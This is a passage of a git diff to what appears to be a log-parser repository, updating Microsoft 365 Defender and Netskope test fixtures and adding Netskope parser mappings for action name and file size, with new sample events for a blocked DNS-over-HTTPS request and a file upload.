\"User\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "iam" diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 3a5d48cd4..2f5082094 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json @@ -55,30 +55,36 @@ "-F", "smtpd_tls_protocols\\commandtest" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "grep -F smtpd_tls_protocols\\commandtest", - "executable": "/usr/test/platform-python3.6", - "hash": { - "md5": "eeeee2999444ddaaaaa08598b06eafe7", - "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", - "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" - }, - "name": "platform-python3.6", + "name": "grep", "parent": { + "args": [ + "--register", + "/usr/lib/python3.6/run.py" + ], + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "executable": "/usr/test/platform-python3.6", + "hash": { + "md5": "eeeee2999444ddaaaaa08598b06eafe7", + "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", + "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" + }, "name": "platform-python3.6", - "pid": 408229, - "start": "2024-09-24T14:17:34.790000Z" + "pid": 408996, + "start": "2024-09-24T14:18:11.850000Z", + "user": { + "domain": "testdomain", + "name": "testaccount" + }, + "working_directory": "/usr/test" }, "pid": 408996, "start": "2024-09-24T14:18:11.864114Z", - "user": { - "domain": "testdomain", - "name": "testaccount" - }, - "working_directory": "/usr/test" + "working_directory": "/usr/bin" }, "related": { "hash": [ diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 1c33c07bc..b4606f079 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -37,6 +37,7 @@ stages: observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" event.action: "{{parsed_event.message.activity}}" + action.name: "{{parsed_event.message.action or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" @@ -92,6 +93,9 @@ stages: - set: file.path: "{{parsed_event.message.file_path}}" filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}' + - set: + file.size: "{{parsed_event.message.file_size}}" + filter: "{{parsed_event.message.file_size not in [None, 0]}}" - translate: dictionary: "yes": "alert" diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index 67944d71d..c564471d7 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T00:29:01Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 79f08033a..952e5c0b6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a05a5c15..05b0456e2 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T12:20:31Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 1b4d67977..cf808efde 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-12-22T16:38:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 8b4635920..fb06271d6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-12-07T10:46:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index b06db05ac..667c5755e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 29f3c0723..996cd6263 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json @@ -19,6 +19,9 @@ ] }, "@timestamp": "2022-12-21T16:12:20Z", + "action": { + "name": "Allow" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 66c901c90..b3cb772d3 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2023-01-31T08:11:53Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "example.org" @@ -30,7 +33,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "mime_type": "eicar.txt" + "mime_type": "eicar.txt", + "size": 19154 }, "http": { "request": { diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 63497504d..e1a0a66c5 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:12:08Z", + "action": { + "name": "Detection" + }, "destination": { "address": "5.6.7.8", "bytes": 0, @@ -36,7 +39,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "name": "eicarcom2.zip" + "name": "eicarcom2.zip", + "size": 308 }, "host": { "name": "MacBook Pro", diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json new file mode 100644 index 000000000..404b5d4ab --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json @@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "event": { + "action": "Browse", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:01:32Z", + "action": { + "name": "block" + }, + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "San Francisco", + "country_iso_code": "US", + "location": { + "lat": 37.775699615478516, + "lon": -122.39520263671875 + }, + "postal_code": "N/A", + "region_name": "California", + "timezone": "America/Los_Angeles" + }, + "ip": "1.2.3.4" + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 11", + "platform": "windows", + "type": "windows", + "version": "Windows NT 11.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "General", + "name": "DNS Over HTTPS" + }, + "ccl": "unknown" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518", + "name": "Block DoH - incompatibility with Netskope" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.8323, + "lon": 2.4075 + }, + "postal_code": "75018", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "test.example.com", + "path": "test.example.com" + }, + "user": { + "domain": "mail.fr", + "email": "john.doe@mail.fr", + "name": "john.doe" + }, + "user_agent": { + "name": "Chrome" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index 25513a172..412ece514 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T15:52:00Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "Example" @@ -43,7 +46,8 @@ "md5": "68b329da9893e34099c7d8ad5cb9c940" }, "mime_type": "image/gif", - "name": "giphy2.gif" + "name": "giphy2.gif", + "size": 204299 }, "host": { "name": "TEST-1111111", diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json new file mode 100644 index 000000000..314e7d7e1 --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json @@ -0,0 +1,123 @@ +{ + "input": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "event": { + "action": "Upload", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "event", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:04:46Z", + "action": { + "name": "Allow" + }, + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "Prague", + "country_iso_code": "CZ", + "location": { + "lat": 50.0883, + "lon": 14.4124 + }, + "postal_code": "110 00", + "region_name": "Prague", + "timezone": "Europe/Prague" + }, + "ip": "1.2.3.4" + }, + "file": { + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940" + }, + "mime_type": "File Type Not Detected", + "name": "object.txt", + "size": 24 + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 10", + "platform": "windows", + "type": "windows", + "version": "Windows NT 10.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "Remote Access", + "name": "App" + }, + "ccl": "medium" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "hash": [ + "68b329da9893e34099c7d8ad5cb9c940" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.6673, + "lon": 2.3476 + }, + "postal_code": "75001", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "url.app.com/object2.txt", + "path": "url.app.com/object2.txt" + }, + "user": { + "domain": "mail.com", + "email": "JDOE@mail.com", + "name": "JDOE" + }, + "user_agent": { + "name": "CHROME", + "version": "6.0;" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index 